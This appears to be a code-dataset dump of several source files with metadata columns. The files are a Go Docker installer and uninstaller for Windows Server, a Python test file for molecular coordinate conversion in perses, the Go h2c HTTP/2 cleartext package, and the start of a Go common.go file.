parameters = make([]string, 0)
output, err = dep.UpdateUtilExeCommandOutput(context, 30, log, command, parameters, "", "", "", "", true)
if err != nil {
log.Error("Error getting containers feature", err)
out.MarkAsFailed(fmt.Errorf("Error getting containers feature: %v", err))
return
}
log.Debug("Get-WindowsFeature output:", output)
packageInstalled := strings.Contains(output, "True")
if !packageInstalled {
out.AppendInfo("Installing Windows containers feature.")
command = "(Install-WindowsFeature -Name containers).RestartNeeded"
parameters = make([]string, 0)
output, err = dep.UpdateUtilExeCommandOutput(context, 30, log, command, parameters, "", "", "", "", true)
if err != nil {
log.Error("Error installing Windows containers feature", err)
out.MarkAsFailed(fmt.Errorf("Error installing Windows containers feature: %v", err))
return
}
log.Debug("Install-WindowsFeature output:", output)
requireReboot = strings.Contains(output, "Yes")
}
}
//Create docker config if it does not exist
daemonConfigPath := os.Getenv("ProgramData") + "\\docker\\config\\daemon.json"
daemonConfigContent := `
{
"fixed-cidr": "172.17.0.0/16"
}
`
if err := dep.SetDaemonConfig(daemonConfigPath, daemonConfigContent); err != nil {
log.Error("Error writing Docker daemon config file", err)
out.MarkAsFailed(fmt.Errorf("Error writing Docker daemon config file: %v", err))
return
}
//Download docker
var downloadOutput artifact.DownloadOutput
downloadOutput, err = dep.ArtifactDownload(context, artifact.DownloadInput{SourceURL: DOCKER_DOWNLOAD_URL, DestinationDirectory: appconfig.DownloadRoot})
if err != nil {
log.Errorf("failed to download file from %v: %v", DOCKER_DOWNLOAD_URL, err)
return
}
log.Debugf("Zip file downloaded to %v", downloadOutput.LocalFilePath)
_, installedErr := os.Stat(DOCKER_INSTALLED_DIRECTORY)
if downloadOutput.IsUpdated || installedErr != nil {
out.AppendInfo("Unzipping Docker to program files directory.")
//uncompress docker zip
fileutil.Uncompress(log, downloadOutput.LocalFilePath, DOCKER_UNCOMPRESS_DIRECTORY)
}
// delete downloaded file, if it exists
pluginutil.CleanupFile(log, downloadOutput.LocalFilePath)
//Set this process's path environment variable to include Docker
if !strings.Contains(strings.ToLower(os.Getenv("path")), strings.ToLower(DOCKER_INSTALLED_DIRECTORY)) {
out.AppendInfo("Setting process path variable to include docker directory")
//set envvariable for this process
os.Setenv("path", DOCKER_INSTALLED_DIRECTORY+";"+os.Getenv("path"))
}
log.Debug("Path set to ", os.Getenv("path"))
//set path env variable for machine to include Docker
var currentSystemPathValue string
currentSystemPathValue, _, err = dep.LocalRegistryKeyGetStringValue(`System\CurrentControlSet\Control\Session Manager\Environment`, "Path")
if err != nil {
log.Error("Error getting current machine registry key value", err)
out.MarkAsFailed(fmt.Errorf("Error getting current machine registry key value: %v", err))
return
}
log.Debug("System Path set to ", currentSystemPathValue)
if !strings.Contains(strings.ToLower(currentSystemPathValue), strings.ToLower(DOCKER_INSTALLED_DIRECTORY)) {
out.AppendInfo("Setting machine path variable to include docker directory")
command = "setx"
parameters = []string{"-m", "path", os.Getenv("path")}
var setPathOutput string
setPathOutput, err = dep.UpdateUtilExeCommandOutput(context, 10, log, command, parameters, "", "", "", "", false)
if err != nil {
log.Error("Error setting machine path environment variable", err)
out.MarkAsFailed(fmt.Errorf("Error setting machine path environment variable: %v", err))
return
}
log.Debug("setx path output:", setPathOutput)
}
//reboot if needed
if requireReboot {
out.AppendInfo("Rebooting machine to complete install")
log.Debug("require reboot is true")
out.SetStatus(contracts.ResultStatusSuccessAndReboot)
return
}
//Check if docker daemon registered
var dockerServiceStatusOutput string
command = "(Get-Service docker).Status"
parameters = make([]string, 0)
dockerServiceStatusOutput, err = dep.UpdateUtilExeCommandOutput(context, 120, log, command, parameters, "", "", "", "", true)
if err != nil {
log.Error("Error getting Docker service status", err)
out.MarkAsFailed(fmt.Errorf("Error getting Docker service status: %v", err))
return
}
log.Debug("Get-Service output:", dockerServiceStatusOutput)
ServiceRunning := strings.HasPrefix(dockerServiceStatusOutput, "Running")
//Register Service
if len(strings.TrimSpace(dockerServiceStatusOutput)) == 0 {
out.AppendInfo("Registering dockerd.")
command = `dockerd`
log.Debug("dockerd cmd:", command)
parameters = []string{"--register-service"}
dockerServiceStatusOutput, err = dep.UpdateUtilExeCommandOutput(context, 120, log, command, parameters, DOCKER_INSTALLED_DIRECTORY, "", "", "", false)
if err != nil {
log.Error("Error registering Docker service", err)
out.MarkAsFailed(fmt.Errorf("Error registering Docker service: %v", err))
return
}
log.Debug("dockerd output:", dockerServiceStatusOutput)
//set service to delayed start
out.AppendInfo("set dockerd service configuration.")
command = "sc.exe"
parameters = []string{"config", "docker", "start=delayed-auto"}
dockerServiceStatusOutput, err = dep.UpdateUtilExeCommandOutput(context, 10, log, command, parameters, "", "", "", "", false)
if err != nil {
log.Error("Error setting delayed start for Docker service", err)
out.MarkAsFailed(fmt.Errorf("Error setting delayed start for Docker service: %v", err))
return
}
log.Debug("sc output:", dockerServiceStatusOutput)
//sleep 10 sec after registering
time.Sleep(10 * time.Second)
}
err = dep.LocalRegistryKeySetDWordValue(`SYSTEM\CurrentControlSet\services\docker`, "AutoStartDelay", 240)
if err != nil {
log.Error("Error opening registry key to set Docker delayed start", err)
out.MarkAsFailed(fmt.Errorf("Error opening registry key to set Docker delayed start: %v", err))
return
}
//Start service
if !ServiceRunning {
out.AppendInfo("Starting Docker service.")
command = "Start-Service docker"
parameters = make([]string, 0)
dockerServiceStatusOutput, err = dep.UpdateUtilExeCommandOutput(context, 300, log, command, parameters, "", "", "", "", true)
if err != nil {
log.Error("Error starting Docker service", err)
out.MarkAsFailed(fmt.Errorf("Error starting Docker service: %v", err))
return
}
log.Debug("start-service output:", dockerServiceStatusOutput)
}
out.AppendInfo("Installation complete")
log.Debug("require reboot:", requireReboot)
out.SetStatus(contracts.ResultStatusSuccess)
return
}
func RunUninstallCommands(context context.T, orchestrationDirectory string, out iohandler.IOHandler) {
var err error
var command string
var parameters []string
var requireReboot bool
var platformVersion string
var isNanoServer bool
var output string
var log = context.Log()
platformVersion, err = dep.PlatformVersion(log)
if err != nil {
log.Error("Error detecting platform version", err)
out.MarkAsFailed(fmt.Errorf("Error detecting platform version: %v", err))
return
}
log.Debug("Platform Version:", platformVersion)
if !strings.HasPrefix(platformVersion, "10") {
out.MarkAsFailed(errors.New("ConfigureDocker is only supported on Microsoft Windows Server 2016."))
return
}
//Check if docker daemon registered and running
var dockerServiceStatusOutput string
command = "(Get-Service docker).Status"
parameters = make([]string, 0)
dockerServiceStatusOutput, err = dep.UpdateUtilExeCommandOutput(context, 120, log, command, parameters, "", "", "", "", true)
if err != nil {
log.Error("Error getting Docker service status", err)
out.MarkAsFailed(fmt.Errorf("Error getting Docker service status: %v", err))
return
}
log.Debug("Get-Service output:", dockerServiceStatusOutput)
ServiceRunning := strings.Contains(dockerServiceStatusOutput, "Running")
//Stop service
if ServiceRunning {
out.AppendInfo("Stopping Docker Service.")
command = "Stop-Service docker"
parameters = make([]string, 0)
dockerServiceStatusOutput, err = dep.UpdateUtilExeCommandOutput(context, 180, log, command, parameters, "", "", "", "", true)
if err != nil {
log.Error("Error stopping Docker service", err)
out.MarkAsFailed(fmt.Errorf("Error stopping Docker service: %v", err))
return
}
log.Debug("stop-service output:", dockerServiceStatusOutput)
}
//Unregister Service
if len(strings.TrimSpace(dockerServiceStatusOutput)) > 0 {
out.AppendInfo("Unregistering dockerd service.")
command = "(Get-WmiObject -Class Win32_Service -Filter \"Name='docker'\").delete()"
parameters = make([]string, 0)
dockerServiceStatusOutput, err = dep.UpdateUtilExeCommandOutput(context, 120, log, command, parameters, DOCKER_INSTALLED_DIRECTORY, "", "", "", true)
if err != nil {
log.Error("Error unregistering Docker service", err)
out.MarkAsFailed(fmt.Errorf("Error unregistering Docker service: %v", err))
return
}
log.Debug("dockerd output:", dockerServiceStatusOutput)
}
//Remove docker directory
if _, err := os.Stat(DOCKER_INSTALLED_DIRECTORY); err == nil {
out.AppendInfo("Removing Docker directory.")
os.RemoveAll(DOCKER_INSTALLED_DIRECTORY)
}
//check if Nano
isNanoServer, err = dep.IsPlatformNanoServer(log)
if err != nil {
log.Error("Error detecting if Nano Server", err)
out.MarkAsFailed(fmt.Errorf("Error detecting if Nano Server: %v", err))
return
}
if isNanoServer {
out.AppendInfo("Removing packages from Nano server not currently supported.")
} else {
//uninstall windows containers feature
command = "(Get-WindowsFeature -Name containers).Installed"
parameters = make([]string, 0)
output, err = dep.UpdateUtilExeCommandOutput(context, 50, log, command, parameters, "", "", "", "", true)
if err != nil {
log.Error("Error getting containers feature", err)
out.MarkAsFailed(fmt.Errorf("Error getting containers feature: %v", err))
return
}
log.Debug("Get-WindowsFeature output:", output)
packageInstalled := strings.Contains(output, "True")
if packageInstalled {
out.AppendInfo("Uninstalling containers Windows feature.")
command = "(Uninstall-WindowsFeature -Name containers).RestartNeeded"
parameters = make([]string, 0)
output, err = dep.UpdateUtilExeCommandOutput(context, 300, log, command, parameters, "", "", "", "", true)
if err != nil {
log.Error("Error uninstalling containers Windows feature", err)
out.MarkAsFailed(fmt.Errorf("Error uninstalling containers Windows feature: %v", err))
return
}
log.Debug("Uninstall-WindowsFeature output:", output)
requireReboot = strings.Contains(output, "Yes")
log.Debug("Requireboot:", requireReboot)
}
//reboot if needed
if requireReboot {
out.AppendInfo("Rebooting machine to complete install")
log.Debug("require reboot is true", requireReboot)
out.SetStatus(contracts.ResultStatusSuccessAndReboot)
return
}
}
out.AppendInfo("Uninstallation complete.")
log.Debug("Uninstallation complete")
out.SetStatus(contracts.ResultStatusSuccess)
return
}
|
[
"\"ProgramData\"",
"\"path\"",
"\"path\"",
"\"path\"",
"\"path\""
] |
[] |
[
"ProgramData",
"path"
] |
[]
|
["ProgramData", "path"]
|
go
| 2 | 0 | |
perses/tests/test_coordinate_numba.py
|
import simtk.openmm as openmm
import openmoltools
import simtk.openmm.app as app
import simtk.unit as unit
import logging
import numpy as np
import parmed
import copy
import os
from unittest import skipIf
from pkg_resources import resource_filename
from openmmtools.constants import kB
from perses.rjmc import coordinate_numba
from perses.rjmc.geometry import check_dimensionality
from perses.tests.test_geometry_engine import _get_internal_from_omm
################################################################################
# Global parameters
################################################################################
temperature = 300.0 * unit.kelvin # unit-bearing temperature
kT = kB * temperature # unit-bearing thermal energy
beta = 1.0/kT # unit-bearing inverse thermal energy
CARBON_MASS = 12.01 # float (implicitly in units of AMU)
REFERENCE_PLATFORM = openmm.Platform.getPlatformByName("Reference")
running_on_github_actions = os.environ.get('GITHUB_ACTIONS', None) == 'true'
#########################################
# Tests
#########################################
def test_coordinate_conversion():
"""
test that the `_internal_to_cartesian` and `_cartesian_to_internal` functions in `geometry.py` convert with correct
dimensionality and within an error of 1e-12 for random inputs
"""
import perses.rjmc.geometry as geometry
geometry_engine = geometry.FFAllAngleGeometryEngine({'test': 'true'})
#try to transform random coordinates to and from cartesian
for i in range(200):
indices = np.random.randint(100, size=4)
atom_position = unit.Quantity(np.array([ 0.80557722 ,-1.10424644 ,-1.08578826]), unit=unit.nanometers)
bond_position = unit.Quantity(np.array([ 0.0765, 0.1 , -0.4005]), unit=unit.nanometers)
angle_position = unit.Quantity(np.array([ 0.0829 , 0.0952 ,-0.2479]) ,unit=unit.nanometers)
torsion_position = unit.Quantity(np.array([-0.057 , 0.0951 ,-0.1863] ) ,unit=unit.nanometers)
rtp, detJ = geometry_engine._cartesian_to_internal(atom_position, bond_position, angle_position, torsion_position)
# Check internal coordinates do not have units
r, theta, phi = rtp
assert isinstance(r, float)
assert isinstance(theta, float)
assert isinstance(phi, float)
# Check that we can reproduce original unit-bearing positions
xyz, _ = geometry_engine._internal_to_cartesian(bond_position, angle_position, torsion_position, r, theta, phi)
assert check_dimensionality(xyz, unit.nanometers)
assert np.linalg.norm(xyz-atom_position) < 1.0e-12
def test_openmm_dihedral():
"""
Test FFAllAngleGeometryEngine _internal_to_cartesian and _cartesian_to_internal are consistent with OpenMM torsion angles.
"""
TORSION_TOLERANCE = 1.0e-4 # permitted disagreement in torsions
# Create geometry engine
from perses.rjmc import geometry
geometry_engine = geometry.FFAllAngleGeometryEngine({'test': 'true'})
# Create a four-bead test system with a single custom force that measures the OpenMM torsion
import simtk.openmm as openmm
integrator = openmm.VerletIntegrator(1.0*unit.femtoseconds)
sys = openmm.System()
force = openmm.CustomTorsionForce("theta")
for i in range(4):
sys.addParticle(1.0*unit.amu)
force.addTorsion(0,1,2,3,[])
sys.addForce(force)
positions = unit.Quantity(np.array([
[0.10557722, -1.10424644, -1.08578826],
[0.0765, 0.1, -0.4005],
[0.0829, 0.0952, -0.2479],
[-0.057, 0.0951, -0.1863],
]), unit.nanometers)
atom_position = positions[0,:]
bond_position = positions[1,:]
angle_position = positions[2,:]
torsion_position = positions[3,:]
#atom_position = unit.Quantity(np.array([ 0.10557722 ,-1.10424644 ,-1.08578826]), unit=unit.nanometers)
#bond_position = unit.Quantity(np.array([ 0.0765, 0.1 , -0.4005]), unit=unit.nanometers)
#angle_position = unit.Quantity(np.array([ 0.0829 , 0.0952 ,-0.2479]) ,unit=unit.nanometers)
#torsion_position = unit.Quantity(np.array([-0.057 , 0.0951 ,-0.1863] ) ,unit=unit.nanometers)
# Compute the dimensionless internal coordinates consistent with this geometry
rtp, detJ = geometry_engine._cartesian_to_internal(atom_position, bond_position, angle_position, torsion_position)
(r, theta, phi) = rtp # dimensionless internal coordinates
# Create a reference context
platform = openmm.Platform.getPlatformByName("Reference")
context = openmm.Context(sys, integrator, platform)
context.setPositions([atom_position, bond_position, angle_position, torsion_position])
openmm_phi = context.getState(getEnergy=True).getPotentialEnergy()/unit.kilojoule_per_mole # this system converts torsion radians -> kJ/mol
assert np.linalg.norm(openmm_phi - phi) < TORSION_TOLERANCE, '_cartesian_to_internal and OpenMM disagree on torsions'
# Test _internal_to_cartesian by rotating around the torsion
n_divisions = 100
phis = np.arange(-np.pi, np.pi, (2.0*np.pi)/n_divisions) # _internal_to_cartesian only accepts dimensionless quantities
for i, phi in enumerate(phis):
# Note that (r, theta, phi) are dimensionless here
xyz_atom1, _ = geometry_engine._internal_to_cartesian(bond_position, angle_position, torsion_position, r, theta, phi)
positions[0,:] = xyz_atom1
context.setPositions(positions)
openmm_phi = context.getState(getEnergy=True).getPotentialEnergy()/unit.kilojoule_per_mole # this system converts torsion radians -> kJ/mol
msg = '_internal_to_cartesian and OpenMM disagree on torsions: \n'
msg += '_internal_to_cartesian generated positions for: {}\n'.format(phi)
msg += 'OpenMM: {}\n'.format(openmm_phi)
msg += 'positions: {}'.format(positions)
assert np.linalg.norm(openmm_phi - phi) < TORSION_TOLERANCE, msg
# Check that _cartesian_to_internal agrees
rtp, detJ = geometry_engine._cartesian_to_internal(xyz_atom1, bond_position, angle_position, torsion_position)
assert np.linalg.norm(phi - rtp[2]) < TORSION_TOLERANCE, '_internal_to_cartesian disagrees with _cartesian_to_internal'
# Clean up
del context
def test_try_random_itoc():
"""
test whether a perturbed four-atom system gives the same internal and cartesian coords when recomputed with `_internal_to_cartesian`
and `_cartesian_to_internal` as compared to the values output by `_get_internal_from_omm`
"""
import perses.rjmc.geometry as geometry
geometry_engine = geometry.FFAllAngleGeometryEngine({'test': 'true'})
import simtk.openmm as openmm
integrator = openmm.VerletIntegrator(1.0*unit.femtoseconds)
sys = openmm.System()
force = openmm.CustomTorsionForce("theta")
for i in range(4):
sys.addParticle(1.0*unit.amu)
force.addTorsion(0,1,2,3,[])
sys.addForce(force)
atom_position = unit.Quantity(np.array([ 0.10557722 ,-1.10424644 ,-1.08578826]), unit=unit.nanometers)
bond_position = unit.Quantity(np.array([ 0.0765, 0.1 , -0.4005]), unit=unit.nanometers)
angle_position = unit.Quantity(np.array([ 0.0829 , 0.0952 ,-0.2479]) ,unit=unit.nanometers)
torsion_position = unit.Quantity(np.array([-0.057 , 0.0951 ,-0.1863] ) ,unit=unit.nanometers)
for i in range(1000):
atom_position += unit.Quantity(np.random.normal(size=3), unit=unit.nanometers)
r, theta, phi = _get_internal_from_omm(atom_position, bond_position, angle_position, torsion_position)
recomputed_xyz, _ = geometry_engine._internal_to_cartesian(bond_position, angle_position, torsion_position, r, theta, phi)
new_r, new_theta, new_phi = _get_internal_from_omm(recomputed_xyz,bond_position, angle_position, torsion_position)
TOLERANCE = 1e-10
difference = np.linalg.norm(np.array(atom_position/unit.nanometers) - np.array(recomputed_xyz/unit.nanometers))
assert difference < TOLERANCE, f"the norm of the difference in positions recomputed with original cartesians ({difference}) is greater than tolerance of {TOLERANCE}"
difference = np.linalg.norm(np.array([r, theta, phi]) - np.array([new_r, new_theta, new_phi]))
assert difference < TOLERANCE, f"the norm of the difference in internals recomputed with original sphericals ({difference}) is greater than tolerance of {TOLERANCE}"
|
[] |
[] |
[
"GITHUB_ACTIONS"
] |
[]
|
["GITHUB_ACTIONS"]
|
python
| 1 | 0 | |
http2/h2c/h2c.go
|
// Copyright 2018 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// Package h2c implements the unencrypted "h2c" form of HTTP/2.
//
// The h2c protocol is the non-TLS version of HTTP/2 which is not available from
// net/http or github.com/Kuraaa/net/http2.
package h2c
import (
"bufio"
"bytes"
"encoding/base64"
"encoding/binary"
"errors"
"fmt"
"io"
"log"
"net"
"net/http"
"net/textproto"
"os"
"strings"
"github.com/Kuraaa/net/http/httpguts"
"github.com/Kuraaa/net/http2"
"github.com/Kuraaa/net/http2/hpack"
)
var (
http2VerboseLogs bool
)
func init() {
e := os.Getenv("GODEBUG")
if strings.Contains(e, "http2debug=1") || strings.Contains(e, "http2debug=2") {
http2VerboseLogs = true
}
}
// h2cHandler is a Handler which implements h2c by hijacking the HTTP/1 traffic
// that should be h2c traffic. There are two ways to begin a h2c connection
// (RFC 7540 Section 3.2 and 3.4): (1) Starting with Prior Knowledge - this
// works by starting an h2c connection with a string of bytes that is valid
// HTTP/1, but unlikely to occur in practice and (2) Upgrading from HTTP/1 to
// h2c - this works by using the HTTP/1 Upgrade header to request an upgrade to
// h2c. When either of those situations occur we hijack the HTTP/1 connection,
// convert it to a HTTP/2 connection and pass the net.Conn to http2.ServeConn.
type h2cHandler struct {
Handler http.Handler
s *http2.Server
}
// NewHandler returns an http.Handler that wraps h, intercepting any h2c
// traffic. If a request is an h2c connection, it's hijacked and redirected to
// s.ServeConn. Otherwise the returned Handler just forwards requests to h. This
// works because h2c is designed to be parseable as valid HTTP/1, but ignored by
// any HTTP server that does not handle h2c. Therefore we leverage the HTTP/1
// compatible parts of the Go http library to parse and recognize h2c requests.
// Once a request is recognized as h2c, we hijack the connection and convert it
// to an HTTP/2 connection which is understandable to s.ServeConn. (s.ServeConn
// understands HTTP/2 except for the h2c part of it.)
func NewHandler(h http.Handler, s *http2.Server) http.Handler {
return &h2cHandler{
Handler: h,
s: s,
}
}
// ServeHTTP implement the h2c support that is enabled by h2c.GetH2CHandler.
func (s h2cHandler) ServeHTTP(w http.ResponseWriter, r *http.Request) {
// Handle h2c with prior knowledge (RFC 7540 Section 3.4)
if r.Method == "PRI" && len(r.Header) == 0 && r.URL.Path == "*" && r.Proto == "HTTP/2.0" {
if http2VerboseLogs {
log.Print("h2c: attempting h2c with prior knowledge.")
}
conn, err := initH2CWithPriorKnowledge(w)
if err != nil {
if http2VerboseLogs {
log.Printf("h2c: error h2c with prior knowledge: %v", err)
}
return
}
defer conn.Close()
s.s.ServeConn(conn, &http2.ServeConnOpts{
Context: r.Context(),
Handler: s.Handler,
})
return
}
// Handle Upgrade to h2c (RFC 7540 Section 3.2)
if conn, err := h2cUpgrade(w, r); err == nil {
defer conn.Close()
s.s.ServeConn(conn, &http2.ServeConnOpts{
Context: r.Context(),
Handler: s.Handler,
})
return
}
s.Handler.ServeHTTP(w, r)
return
}
// initH2CWithPriorKnowledge implements creating a h2c connection with prior
// knowledge (Section 3.4) and creates a net.Conn suitable for http2.ServeConn.
// All we have to do is look for the client preface that is suppose to be part
// of the body, and reforward the client preface on the net.Conn this function
// creates.
func initH2CWithPriorKnowledge(w http.ResponseWriter) (net.Conn, error) {
hijacker, ok := w.(http.Hijacker)
if !ok {
panic("Hijack not supported.")
}
conn, rw, err := hijacker.Hijack()
if err != nil {
panic(fmt.Sprintf("Hijack failed: %v", err))
}
const expectedBody = "SM\r\n\r\n"
buf := make([]byte, len(expectedBody))
n, err := io.ReadFull(rw, buf)
if err != nil {
return nil, fmt.Errorf("could not read from the buffer: %s", err)
}
if string(buf[:n]) == expectedBody {
c := &rwConn{
Conn: conn,
Reader: io.MultiReader(strings.NewReader(http2.ClientPreface), rw),
BufWriter: rw.Writer,
}
return c, nil
}
conn.Close()
if http2VerboseLogs {
log.Printf(
"h2c: missing the request body portion of the client preface. Wanted: %v Got: %v",
[]byte(expectedBody),
buf[0:n],
)
}
return nil, errors.New("invalid client preface")
}
// drainClientPreface reads a single instance of the HTTP/2 client preface from
// the supplied reader.
func drainClientPreface(r io.Reader) error {
var buf bytes.Buffer
prefaceLen := int64(len(http2.ClientPreface))
n, err := io.CopyN(&buf, r, prefaceLen)
if err != nil {
return err
}
if n != prefaceLen || buf.String() != http2.ClientPreface {
return fmt.Errorf("Client never sent: %s", http2.ClientPreface)
}
return nil
}
// h2cUpgrade establishes a h2c connection using the HTTP/1 upgrade (Section 3.2).
func h2cUpgrade(w http.ResponseWriter, r *http.Request) (net.Conn, error) {
if !isH2CUpgrade(r.Header) {
return nil, errors.New("non-conforming h2c headers")
}
// Initial bytes we put into conn to fool http2 server
initBytes, _, err := convertH1ReqToH2(r)
if err != nil {
return nil, err
}
hijacker, ok := w.(http.Hijacker)
if !ok {
return nil, errors.New("hijack not supported.")
}
conn, rw, err := hijacker.Hijack()
if err != nil {
return nil, fmt.Errorf("hijack failed: %v", err)
}
rw.Write([]byte("HTTP/1.1 101 Switching Protocols\r\n" +
"Connection: Upgrade\r\n" +
"Upgrade: h2c\r\n\r\n"))
rw.Flush()
// A conforming client will now send an H2 client preface which need to drain
// since we already sent this.
if err := drainClientPreface(rw); err != nil {
return nil, err
}
c := &rwConn{
Conn: conn,
Reader: io.MultiReader(initBytes, rw),
BufWriter: newSettingsAckSwallowWriter(rw.Writer),
}
return c, nil
}
// convert the data contained in the HTTP/1 upgrade request into the HTTP/2
// version in byte form.
func convertH1ReqToH2(r *http.Request) (*bytes.Buffer, []http2.Setting, error) {
h2Bytes := bytes.NewBuffer([]byte((http2.ClientPreface)))
framer := http2.NewFramer(h2Bytes, nil)
settings, err := getH2Settings(r.Header)
if err != nil {
return nil, nil, err
}
if err := framer.WriteSettings(settings...); err != nil {
return nil, nil, err
}
headerBytes, err := getH2HeaderBytes(r, getMaxHeaderTableSize(settings))
if err != nil {
return nil, nil, err
}
maxFrameSize := int(getMaxFrameSize(settings))
needOneHeader := len(headerBytes) < maxFrameSize
err = framer.WriteHeaders(http2.HeadersFrameParam{
StreamID: 1,
BlockFragment: headerBytes,
EndHeaders: needOneHeader,
})
if err != nil {
return nil, nil, err
}
for i := maxFrameSize; i < len(headerBytes); i += maxFrameSize {
if len(headerBytes)-i > maxFrameSize {
if err := framer.WriteContinuation(1,
false, // endHeaders
headerBytes[i:maxFrameSize]); err != nil {
return nil, nil, err
}
} else {
if err := framer.WriteContinuation(1,
true, // endHeaders
headerBytes[i:]); err != nil {
return nil, nil, err
}
}
}
return h2Bytes, settings, nil
}
// getMaxFrameSize returns the SETTINGS_MAX_FRAME_SIZE. If not present default
// value is 16384 as specified by RFC 7540 Section 6.5.2.
func getMaxFrameSize(settings []http2.Setting) uint32 {
for _, setting := range settings {
if setting.ID == http2.SettingMaxFrameSize {
return setting.Val
}
}
return 16384
}
// getMaxHeaderTableSize returns the SETTINGS_HEADER_TABLE_SIZE. If not present
// default value is 4096 as specified by RFC 7540 Section 6.5.2.
func getMaxHeaderTableSize(settings []http2.Setting) uint32 {
for _, setting := range settings {
if setting.ID == http2.SettingHeaderTableSize {
return setting.Val
}
}
return 4096
}
// bufWriter is a Writer interface that also has a Flush method.
type bufWriter interface {
io.Writer
Flush() error
}
// rwConn implements net.Conn but overrides Read and Write so that reads and
// writes are forwarded to the provided io.Reader and bufWriter.
type rwConn struct {
net.Conn
io.Reader
BufWriter bufWriter
}
// Read forwards reads to the underlying Reader.
func (c *rwConn) Read(p []byte) (int, error) {
return c.Reader.Read(p)
}
// Write forwards writes to the underlying bufWriter and immediately flushes.
func (c *rwConn) Write(p []byte) (int, error) {
n, err := c.BufWriter.Write(p)
if err := c.BufWriter.Flush(); err != nil {
return 0, err
}
return n, err
}
// settingsAckSwallowWriter is a writer that normally forwards bytes to its
// underlying Writer, but swallows the first SettingsAck frame that it sees.
type settingsAckSwallowWriter struct {
Writer *bufio.Writer
buf []byte
didSwallow bool
}
// newSettingsAckSwallowWriter returns a new settingsAckSwallowWriter.
func newSettingsAckSwallowWriter(w *bufio.Writer) *settingsAckSwallowWriter {
return &settingsAckSwallowWriter{
Writer: w,
buf: make([]byte, 0),
didSwallow: false,
}
}
// Write implements io.Writer interface. Normally forwards bytes to w.Writer,
// except for the first Settings ACK frame that it sees.
func (w *settingsAckSwallowWriter) Write(p []byte) (int, error) {
if !w.didSwallow {
w.buf = append(w.buf, p...)
// Process all the frames we have collected into w.buf
for {
// Append until we get full frame header which is 9 bytes
if len(w.buf) < 9 {
break
}
// Check if we have collected a whole frame.
fh, err := http2.ReadFrameHeader(bytes.NewBuffer(w.buf))
if err != nil {
// Corrupted frame, fail current Write
return 0, err
}
fSize := fh.Length + 9
if uint32(len(w.buf)) < fSize {
// Have not collected whole frame. Stop processing buf, and withold on
// forward bytes to w.Writer until we get the full frame.
break
}
// We have now collected a whole frame.
if fh.Type == http2.FrameSettings && fh.Flags.Has(http2.FlagSettingsAck) {
// If Settings ACK frame, do not forward to underlying writer, remove
// bytes from w.buf, and record that we have swallowed Settings Ack
// frame.
w.didSwallow = true
w.buf = w.buf[fSize:]
continue
}
// Not settings ack frame. Forward bytes to w.Writer.
if _, err := w.Writer.Write(w.buf[:fSize]); err != nil {
// Couldn't forward bytes. Fail current Write.
return 0, err
}
w.buf = w.buf[fSize:]
}
return len(p), nil
}
return w.Writer.Write(p)
}
// Flush calls w.Writer.Flush.
func (w *settingsAckSwallowWriter) Flush() error {
return w.Writer.Flush()
}
// isH2CUpgrade returns true if the header properly request an upgrade to h2c
// as specified by Section 3.2.
func isH2CUpgrade(h http.Header) bool {
return httpguts.HeaderValuesContainsToken(h[textproto.CanonicalMIMEHeaderKey("Upgrade")], "h2c") &&
httpguts.HeaderValuesContainsToken(h[textproto.CanonicalMIMEHeaderKey("Connection")], "HTTP2-Settings")
}
// getH2Settings returns the []http2.Setting that are encoded in the
// HTTP2-Settings header.
func getH2Settings(h http.Header) ([]http2.Setting, error) {
vals, ok := h[textproto.CanonicalMIMEHeaderKey("HTTP2-Settings")]
if !ok {
return nil, errors.New("missing HTTP2-Settings header")
}
if len(vals) != 1 {
return nil, fmt.Errorf("expected 1 HTTP2-Settings. Got: %v", vals)
}
settings, err := decodeSettings(vals[0])
if err != nil {
return nil, fmt.Errorf("Invalid HTTP2-Settings: %q", vals[0])
}
return settings, nil
}
// decodeSettings decodes the base64url header value of the HTTP2-Settings
// header. RFC 7540 Section 3.2.1.
func decodeSettings(headerVal string) ([]http2.Setting, error) {
b, err := base64.RawURLEncoding.DecodeString(headerVal)
if err != nil {
return nil, err
}
if len(b)%6 != 0 {
return nil, err
}
settings := make([]http2.Setting, 0)
for i := 0; i < len(b)/6; i++ {
settings = append(settings, http2.Setting{
ID: http2.SettingID(binary.BigEndian.Uint16(b[i*6 : i*6+2])),
Val: binary.BigEndian.Uint32(b[i*6+2 : i*6+6]),
})
}
return settings, nil
}
// getH2HeaderBytes return the headers in r a []bytes encoded by HPACK.
func getH2HeaderBytes(r *http.Request, maxHeaderTableSize uint32) ([]byte, error) {
headerBytes := bytes.NewBuffer(nil)
hpackEnc := hpack.NewEncoder(headerBytes)
hpackEnc.SetMaxDynamicTableSize(maxHeaderTableSize)
// Section 8.1.2.3
err := hpackEnc.WriteField(hpack.HeaderField{
Name: ":method",
Value: r.Method,
})
if err != nil {
return nil, err
}
err = hpackEnc.WriteField(hpack.HeaderField{
Name: ":scheme",
Value: "http",
})
if err != nil {
return nil, err
}
err = hpackEnc.WriteField(hpack.HeaderField{
Name: ":authority",
Value: r.Host,
})
if err != nil {
return nil, err
}
path := r.URL.Path
if r.URL.RawQuery != "" {
path = strings.Join([]string{path, r.URL.RawQuery}, "?")
}
err = hpackEnc.WriteField(hpack.HeaderField{
Name: ":path",
Value: path,
})
if err != nil {
return nil, err
}
// TODO Implement Section 8.3
for header, values := range r.Header {
// Skip non h2 headers
if isNonH2Header(header) {
continue
}
for _, v := range values {
err := hpackEnc.WriteField(hpack.HeaderField{
Name: strings.ToLower(header),
Value: v,
})
if err != nil {
return nil, err
}
}
}
return headerBytes.Bytes(), nil
}
// Connection specific headers listed in RFC 7540 Section 8.1.2.2 that are not
// suppose to be transferred to HTTP/2. The Http2-Settings header is skipped
// since already use to create the HTTP/2 SETTINGS frame.
var nonH2Headers = []string{
"Connection",
"Keep-Alive",
"Proxy-Connection",
"Transfer-Encoding",
"Upgrade",
"Http2-Settings",
}
// isNonH2Header returns true if header should not be transferred to HTTP/2.
func isNonH2Header(header string) bool {
for _, nonH2h := range nonH2Headers {
if header == nonH2h {
return true
}
}
return false
}
|
[
"\"GODEBUG\""
] |
[] |
[
"GODEBUG"
] |
[]
|
["GODEBUG"]
|
go
| 1 | 0 | |
internal/peer/common/common.go
|
/*
Copyright IBM Corp. All Rights Reserved.
SPDX-License-Identifier: Apache-2.0
*/
package common
import (
"context"
"crypto/tls"
"fmt"
"io/ioutil"
"os"
"runtime"
"strings"
"time"
pcommon "github.com/mcc-github/blockchain-protos-go/common"
pb "github.com/mcc-github/blockchain-protos-go/peer"
